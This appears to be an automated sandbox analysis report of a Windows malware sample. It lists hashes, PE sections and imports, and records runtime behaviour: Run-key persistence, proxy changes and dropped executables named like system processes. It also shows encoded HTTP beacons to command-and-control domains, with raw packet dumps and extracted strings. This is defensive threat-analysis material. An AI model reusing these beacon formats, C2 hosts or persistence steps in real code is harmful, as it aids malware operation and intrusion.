Analysis Date 2014-10-02 22:07:11
MD5 b999b923e3663519f6eca571a28327c5
SHA1 1b559ce8e64418beab3b3d1de487708e5ef0f679

Static Details:

File type PE32 executable for MS Windows (GUI) Intel 80386
Section .text md5: 682a619b546aea37803fbea4f5d6718a sha1: ff820e540b18a9e2c97bab7bb472d7bec5304d52 size: 97792
Section .rdata md5: ed822bfdd3928b372c2fe49578622f3d sha1: ccc760fba651f0d5ae7793b49a3d86a6563afc36 size: 2560
Section .data md5: 27445ef9864dc03ea07cf53c24571d57 sha1: 93e85604fc5f425ee24beaf73fc0c64862f3986f size: 58880
Section .imul md5: 02634dffa6e1f12c661f140e5db341ca sha1: 28c68e2e52d3f82d960a80454ef93f4f1eebae64 size: 1024
Timestamp 2005-10-16 11:00:17
Version ProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1423
PEhash 714bca073c3cc8ab2137b713eb989c592877e178
IMPhash 720efc1c57f73249e421366fd3dc2b28

Runtime Details:


Process
↳ C:\malware.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS doublemouseklick.com
Winsock DNS 127.0.0.1
Winsock DNS bigbeerclubonline.com
Winsock DNS onlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS onlineinstitute.com
Type: A
67.227.195.200
DNS zonetf.com
Type: A
141.8.225.80
DNS zonetf.com
Type: A
141.8.225.80
DNS bigbeerclubonline.com
Type: A
DNS doublemouseklick.com
Type: A
HTTP GET http://onlineinstitute.com/g7/images/logo4.jpg?v72=20&tq=gKZEtzyixSz072FJXLFEwlOoKA29eKJ2mi2Q0gH9HVXCgU%2FeSxRsZIJKsBA7WTjKBHkwU%2Fv4%2B2ghTJzEY373ZlXwDljuu3rU7QlXfbfb%2B%2B2Z8eJEQltsaDii2yGdR%2FJc7GhN%2B9%2FuuzByCapmiEOUBqRotyTRlxlqqvAaYr353fp0OG7y3aG35iMJRsxSSYoGwWrFXvvDBKXmHoov3y9do07OKpIoB5430AIYgRPVz7xRWKWnKRaO2nHA%2FwAbae%2BHe3BZeY%2F316h9i0ugWBHRMEWkZJByEOj8XC8R2MnxwPNyUsZjGJswSRRF%2F8z2oRNfHpjHT1wLMDf4U894AyvxvYgqaS%2Bvtwm3V0cFbcAMwc9WJsEmsC5dLhsaSSKl8yVOqsRR2IA9FlRWbCV30Dy7QybeOF%2Fg8fBquZp0NBZmyjC%2BzIXx99CVkVX%2B2xGnW%2FUUIBM2IQxPgg4X5F0dy3SxvSGCzgFEyb1
User-Agent: mozilla/2.0
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP 192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP 192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f34 2e6a7067 3f763732 3d323026   ogo4.jpg?v72=20&
0x00000020 (00032)   74713d67 4b5a4574 7a796978 537a3037   tq=gKZEtzyixSz07
0x00000030 (00048)   32464a58 4c464577 6c4f6f4b 41323965   2FJXLFEwlOoKA29e
0x00000040 (00064)   4b4a326d 69325130 67483948 56584367   KJ2mi2Q0gH9HVXCg
0x00000050 (00080)   55253246 65537852 735a494a 4b734241   U%2FeSxRsZIJKsBA
0x00000060 (00096)   3757546a 4b42486b 77552532 46763425   7WTjKBHkwU%2Fv4%
0x00000070 (00112)   32423267 68544a7a 45593337 335a6c58   2B2ghTJzEY373ZlX
0x00000080 (00128)   77446c6a 75753372 5537516c 58666266   wDljuu3rU7QlXfbf
0x00000090 (00144)   62253242 25324232 5a38654a 45516c74   b%2B%2B2Z8eJEQlt
0x000000a0 (00160)   73614469 69327947 64522532 464a6337   saDii2yGdR%2FJc7
0x000000b0 (00176)   47684e25 32423925 32467575 7a427943   GhN%2B9%2FuuzByC
0x000000c0 (00192)   61706d69 454f5542 71526f74 7954526c   apmiEOUBqRotyTRl
0x000000d0 (00208)   786c7171 76416159 72333533 6670304f   xlqqvAaYr353fp0O
0x000000e0 (00224)   47377933 61473335 694d4a52 73785353   G7y3aG35iMJRsxSS
0x000000f0 (00240)   596f4777 57724658 76764442 4b586d48   YoGwWrFXvvDBKXmH
0x00000100 (00256)   6f6f7633 7939646f 30374f4b 70496f42   oov3y9do07OKpIoB
0x00000110 (00272)   35343330 41495967 5250567a 37785257   5430AIYgRPVz7xRW
0x00000120 (00288)   4b576e4b 52614f32 6e484125 32467741   KWnKRaO2nHA%2FwA
0x00000130 (00304)   62616525 32424865 33425a65 59253246   bae%2BHe3BZeY%2F
0x00000140 (00320)   33313668 39693075 67574248 524d4557   316h9i0ugWBHRMEW
0x00000150 (00336)   6b5a4a42 79454f6a 38584338 52324d6e   kZJByEOj8XC8R2Mn
0x00000160 (00352)   7877504e 7955735a 6a474a73 77535252   xwPNyUsZjGJswSRR
0x00000170 (00368)   46253246 387a326f 524e6648 706a4854   F%2F8z2oRNfHpjHT
0x00000180 (00384)   31774c4d 44663455 38393441 79767876   1wLMDf4U894Ayvxv
0x00000190 (00400)   59677161 53253242 7674776d 33563063   YgqaS%2Bvtwm3V0c
0x000001a0 (00416)   46626341 4d776339 574a7345 6d734335   FbcAMwc9WJsEmsC5
0x000001b0 (00432)   644c6873 6153534b 6c387956 4f717352   dLhsaSSKl8yVOqsR
0x000001c0 (00448)   52324941 39466c52 57624356 33304479   R2IA9FlRWbCV30Dy
0x000001d0 (00464)   37517962 654f4625 32466738 66427175   7QybeOF%2Fg8fBqu
0x000001e0 (00480)   5a70304e 425a6d79 6a432532 427a4958   Zp0NBZmyjC%2BzIX
0x000001f0 (00496)   78393943 566b5658 25324232 78476e57   x99CVkVX%2B2xGnW
0x00000200 (00512)   25324655 5549424d 32495178 50676734   %2FUUIBM2IQxPgg4
0x00000210 (00528)   58354630 64793353 78765347 437a6746   X5F0dy3SxvSGCzgF
0x00000220 (00544)   45796231 20485454 502f312e 300d0a43   Eyb1 HTTP/1.0..C
0x00000230 (00560)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000240 (00576)   0d0a486f 73743a20 6f6e6c69 6e65696e   ..Host: onlinein
0x00000250 (00592)   73746974 7574652e 636f6d0d 0a416363   stitute.com..Acc
0x00000260 (00608)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000270 (00624)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000280 (00640)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e755825 32425039 68253242 49307344   NuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6a 38584338 52324d6e   ose....j8XC8R2Mn
0x00000160 (00352)   7877504e 7955735a 6a474a73 77535252   xwPNyUsZjGJswSRR
0x00000170 (00368)   46253246 387a326f 524e6648 706a4854   F%2F8z2oRNfHpjHT
0x00000180 (00384)   31774c4d 44663455 38393441 79767876   1wLMDf4U894Ayvxv
0x00000190 (00400)   59677161 53253242 7674776d 33563063   YgqaS%2Bvtwm3V0c
0x000001a0 (00416)   46626341 4d776339 574a7345 6d734335   FbcAMwc9WJsEmsC5
0x000001b0 (00432)   644c6873 6153534b 6c387956 4f717352   dLhsaSSKl8yVOqsR
0x000001c0 (00448)   52324941 39466c52 57624356 33304479   R2IA9FlRWbCV30Dy
0x000001d0 (00464)   37517962 654f4625 32466738 66427175   7QybeOF%2Fg8fBqu
0x000001e0 (00480)   5a70304e 425a6d79 6a432532 427a4958   Zp0NBZmyjC%2BzIX
0x000001f0 (00496)   78393943 566b5658 25324232 78476e57   x99CVkVX%2B2xGnW
0x00000200 (00512)   25324655 5549424d 32495178 50676734   %2FUUIBM2IQxPgg4
0x00000210 (00528)   58354630 64793353 78765347 437a6746   X5F0dy3SxvSGCzgF
0x00000220 (00544)   45796231 20485454 502f312e 300d0a43   Eyb1 HTTP/1.0..C
0x00000230 (00560)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000240 (00576)   0d0a486f 73743a20 6f6e6c69 6e65696e   ..Host: onlinein
0x00000250 (00592)   73746974 7574652e 636f6d0d 0a416363   stitute.com..Acc
0x00000260 (00608)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000270 (00624)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000280 (00640)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e755825 32425039 68253242 49307344   NuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
7.
...:.^'
NI@S..]....
..U
..U..
\
3.....s.
O.pa]
T
.Aa
..
.
ZSz..7.
x.1
<......R
..^%.
.].
....)
.cF?..
b
.
..
.
j
u
040904b0
@0$B
1.0.0.3
1423
1DG 3
2DEp
'3A1
a"s#
bq`FC
Df0r
FileVersion
G#3B
p"0d
'P3r
PrivateBuild
ProductVersion
`qf#
'rd2
$SQb
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
^/-~}#
0aU-Nf
	0t/qb
-0U0^h
1"bN"U
`|1sO:
1'-ziO
2eyKP`
3]A&6]
3@,MGt
3q=vV]
3R(XC4
3stMGE
/ =4HM
4r*-%f
\5)*w@
#6i~_-
6nd=rH
-7Y%_,-
8HHLo8
8O|`b`
8s*ooAlZ
<9^i)t
]9N[k7
AdjustWindowRect
ADVAPI32.dll
$^ag|H
a_Im#@
Am4JWBM
B&	d~J940
BitBlt
bRIFn<
$=b>`t`P<"
]C'7Bsc
CombineRgn
COMCTL32.dll
comdlg32.dll
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCW
CreateDIBSection
CreateFileA
CreateFontW
CreatePatternBrush
CreatePen
CreateProcessW
CreateSolidBrush
CR^}:R
\cZbvZR
D6IJEc
D 8o6gp
@.data
DeleteDC
DeleteFileW
DeleteObject
Dks'*2`
DK?Vyq
d|m6v0
dWQ~pc
E7d.UK
 Eaw?R
>Ed00-R>
	e/:M:e@
EndDialog
EnumResourceNamesW
ExitProcess
ExtCreateRegion
F2|t5_`
F?F`2\
FindClose
FindFirstFileW
fkjU_4J
FreeLibrary
FUTq(~
GDI32.dll
GetCharWidthW
GetCurrentProcessId
GetDeviceCaps
GetDlgItem
GetLocalTime
GetMenuStringW
GetModuleHandleA
GetObjectW
GetProcAddress
GetSaveFileNameW
GetStockObject
GetSysColor
GetTextMetricsW
GetUserDefaultUILanguage
GetVDMCurrentDirectories
GetWindowInfo
GetWindowLongW
GetWindowRect
~gKo:Uw
Gx #M~P
HeapAlloc
HeapFree
\hP$_Q
hU+(aR
i%2Ez eXN
ICInfo
ImageList_Create
ImageList_Destroy
ImageList_Draw
ImageList_ReplaceIcon
iRQg"N
Ix|kl"
Jkj	KJZs
{JQ|2K
j)v*.J
K)5m>#
KERNEL32.dll
Km]S$A
k"q+/5i
k	s,8+
L5)SL+
LineTo
%lK[;#
lm*cj%
]}LMZu
LoadLibraryW
)Lo+E$
L-p[n&
LwP,h^"2
M7>9;4
MBh\O0}x
mc_`&F
MessageBoxW
"M;}hYg
m)lZtG
MoveFileW
MoveToEx
MoveWindow
m|(PB'
M\rAZ`,
MSVFW32.dll
M<UBjF
MultiByteToWideChar
m[vNh$	
N/`'2la
n[$g/e+3
nQAAcA
nuyj+s
n'Zg*U
{.oA|B
OutputDebugStringW
oVM=}+R
 p:i>f
pl;qy+o
qLk|=jK
qlOj?=N
Qs^g%p
@~=\,QV
QvEM7O
qwO&S7
R^22z_
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExW
RegDeleteKeyA
RegEnumKeyW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryValueExW
RegSetValueExW
@r:hm_{q
Rich`x
%rk`/x
`s4{6~4
S"d V]+
SelectObject
SendMessageW
SetBkColor
SetBkMode
SetFilePointer
SetRect
SetTextColor
SetThreadPriorityBoost
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowsHookExW
SetWindowTextW
SHELL32.dll
ShellExecuteW
StretchBlt
!This program cannot be run in DOS mode.
tjs	nE
tnir#z
t&RZEKp
Tw2dSD
tx9z`6A
+UG}\63<
Uhrc`;
/.uOOr
USER32.dll
}uXU9qinG9
{ .\v))
V|!}`SKA_28
W]4>-!
WideCharToMultiByte
wIwR_O
-W.;oH(
WriteFile
wZoX@4
}~X-:|
	X[e;`
.xT8,9
xV9z{mP
xySl;\
(y5Z}QQ
[y.@8<^!
#$<>#YTVMb34
Y ?,:W
%yz_JT
YZ&~|kp
Z+pbTM